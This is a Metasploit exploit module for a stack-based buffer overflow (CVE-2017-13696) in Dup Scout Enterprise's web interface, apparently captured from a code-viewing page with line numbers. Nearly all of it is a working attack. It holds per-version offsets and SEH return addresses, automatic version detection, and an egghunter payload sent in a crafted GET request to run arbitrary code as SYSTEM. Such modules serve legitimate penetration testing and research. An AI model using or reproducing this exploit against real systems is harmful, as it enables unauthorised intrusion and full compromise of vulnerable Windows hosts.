Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::Seh
10
  include Msf::Exploit::Remote::Egghunter
11
  include Msf::Exploit::Remote::HttpClient
12
  prepend Msf::Exploit::Remote::AutoCheck
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Dup Scout Enterprise GET Buffer Overflow',
19
        'Description' => %q{
20
          This module exploits a stack-based buffer overflow vulnerability
21
          in the web interface of Dup Scout Enterprise versions <= 10.0.18,
22
          caused by improper bounds checking of the request path in HTTP GET
23
          requests sent to the built-in web server which can be leveraged
24
          to execute arbitrary code in the context of NT AUTHORITY\SYSTEM.
25

26
          This module supports x86 versions of Dup Scout Enterprise and x86
27
          Windows operating systems only and has been tested successfully on
28
          Windows 7 SP1 (x86) and Windows XP SP0 (x86).
29
        },
30
        'License' => MSF_LICENSE,
31
        'Author' =>
32
          [
33
            'vportal', # Vulnerability discovery and PoC
34
            'Daniel Teixeira', # Metasploit module
35
            'bcoles', # Automatic targetting and additional targets
36
          ],
37
        'References' =>
38
          [
39
            ['CVE', '2017-13696'],
40
            ['CWE', '121'],
41
            ['EDB', '42557'],
42
            ['EDB', '49217']
43
          ],
44
        'DefaultOptions' =>
45
          {
46
            'EXITFUNC' => 'thread'
47
          },
48
        'Platform' => 'win',
49
        'Arch' => ARCH_X86,
50
        'Payload' =>
51
          {
52
            'BadChars' => "\x00\x09\x0a\x0d\x20\x26",
53
            'Space' => 500
54
          },
55
        'Targets' =>
56
          [
57
            [ 'Automatic', { 'auto' => true } ],
58
            [
59
              'Dup Scout Enterprise v8.3.16 (x86)',
60
              {
61
                'Version' => '8.3.16',
62
                'Offset' => 552,
63
                # 0x10045543 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
64
                'Ret' => 0x10045543
65
              }
66
            ],
67
            [
68
              'Dup Scout Enterprise v8.4.16 (x86)',
69
              {
70
                'Version' => '8.4.16',
71
                'Offset' => 552,
72
                # 0x10045c33 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
73
                'Ret' => 0x10045c33
74
              }
75
            ],
76
            [
77
              'Dup Scout Enterprise v9.0.28 (x86)',
78
              {
79
                'Version' => '9.0.28',
80
                'Offset' => 552,
81
                # 0x1004d983 : pop ebx # pop ecx # ret 0x20 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
82
                'Ret' => 0x1004d983
83
              }
84
            ],
85
            [
86
              'Dup Scout Enterprise v9.1.14 (x86)',
87
              {
88
                'Version' => '9.1.14',
89
                'Offset' => 552,
90
                # 0x10081b78 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
91
                'Ret' => 0x10081b78
92
              }
93
            ],
94
            [
95
              'Dup Scout Enterprise v9.5.14 (x86)',
96
              {
97
                'Version' => '9.5.14',
98
                'Offset' => 2488,
99
                # POP # POP # RET [libspp.dll]
100
                'Ret' => 0x10050ff3
101
              }
102
            ],
103
            [
104
              'Dup Scout Enterprise v9.9.14 (x86)',
105
              {
106
                'Version' => '9.9.14',
107
                'Offset' => 2496,
108
                # 0x10056c1d : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
109
                'Ret' => 0x10056c1d
110
              }
111
            ],
112
            [
113
              'Dup Scout Enterprise v10.0.18 (x86)',
114
              {
115
                'Version' => '10.0.18',
116
                'Offset' => 2496,
117
                # 0x10056a16 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
118
                'Ret' => 0x10056a16
119
              }
120
            ],
121
          ],
122
        'Notes' =>
123
          {
124
            'Stability' => [ CRASH_SERVICE_DOWN ],
125
            'SideEffects' => [ IOC_IN_LOGS ],
126
            'Reliability' => [ REPEATABLE_SESSION ]
127
          },
128
        'Privileged' => true,
129
        'DisclosureDate' => '2017-03-15',
130
        'DefaultTarget' => 0
131
      )
132
    )
133
  end
134

135
  def check
136
    res = send_request_cgi({
137
      'uri' => '/',
138
      'method' => 'GET'
139
    })
140

141
    unless res
142
      return CheckCode::Unknown('Connection failed.')
143
    end
144

145
    version = res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first
146

147
    unless version
148
      return CheckCode::Safe('Target is not Dup Scout Enterprise.')
149
    end
150

151
    unless target_for_version(version)
152
      return CheckCode::Detected("No targets for Dup Scout Enterprise version #{version}.")
153
    end
154

155
    CheckCode::Appears("Dup Scout Enterprise version #{version}.")
156
  end
157

158
  def dup_version
159
    res = send_request_cgi({
160
      'uri' => '/',
161
      'method' => 'GET'
162
    })
163

164
    unless res
165
      return fail_with(Failure::Unreachable, 'Could not determine Dup Scout Enterprise version. No reply.')
166
    end
167

168
    res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first
169
  end
170

171
  def target_for_version(version)
172
    return unless version
173

174
    targets.select { |t| version == t['Version'] }.first
175
  end
176

177
  def exploit
178
    my_target = target
179

180
    if target.name == 'Automatic'
181
      print_status('Selecting a target...')
182
      my_target = target_for_version(dup_version)
183
      unless my_target
184
        fail_with(Failure::NoTarget, 'Unable to automatically detect a target')
185
      end
186
    end
187

188
    print_status("Using target: #{my_target.name}")
189

190
    eggoptions = {
191
      checksum: true,
192
      eggtag: rand_text_alpha(4, payload_badchars)
193
    }
194

195
    hunter, egg = generate_egghunter(
196
      payload.encoded,
197
      payload_badchars,
198
      eggoptions
199
    )
200

201
    sploit = rand_text_alpha(my_target['Offset'], payload_badchars)
202
    sploit << generate_seh_record(my_target.ret)
203
    sploit << hunter
204
    sploit << make_nops(10)
205
    sploit << egg
206
    sploit << rand_text_alpha(5500, payload_badchars)
207

208
    print_status("Sending payload (#{sploit.length} bytes) ...")
209

210
    send_request_cgi({
211
      'method' => 'GET',
212
      'uri' => sploit
213
    })
214
  end
215
end
216

217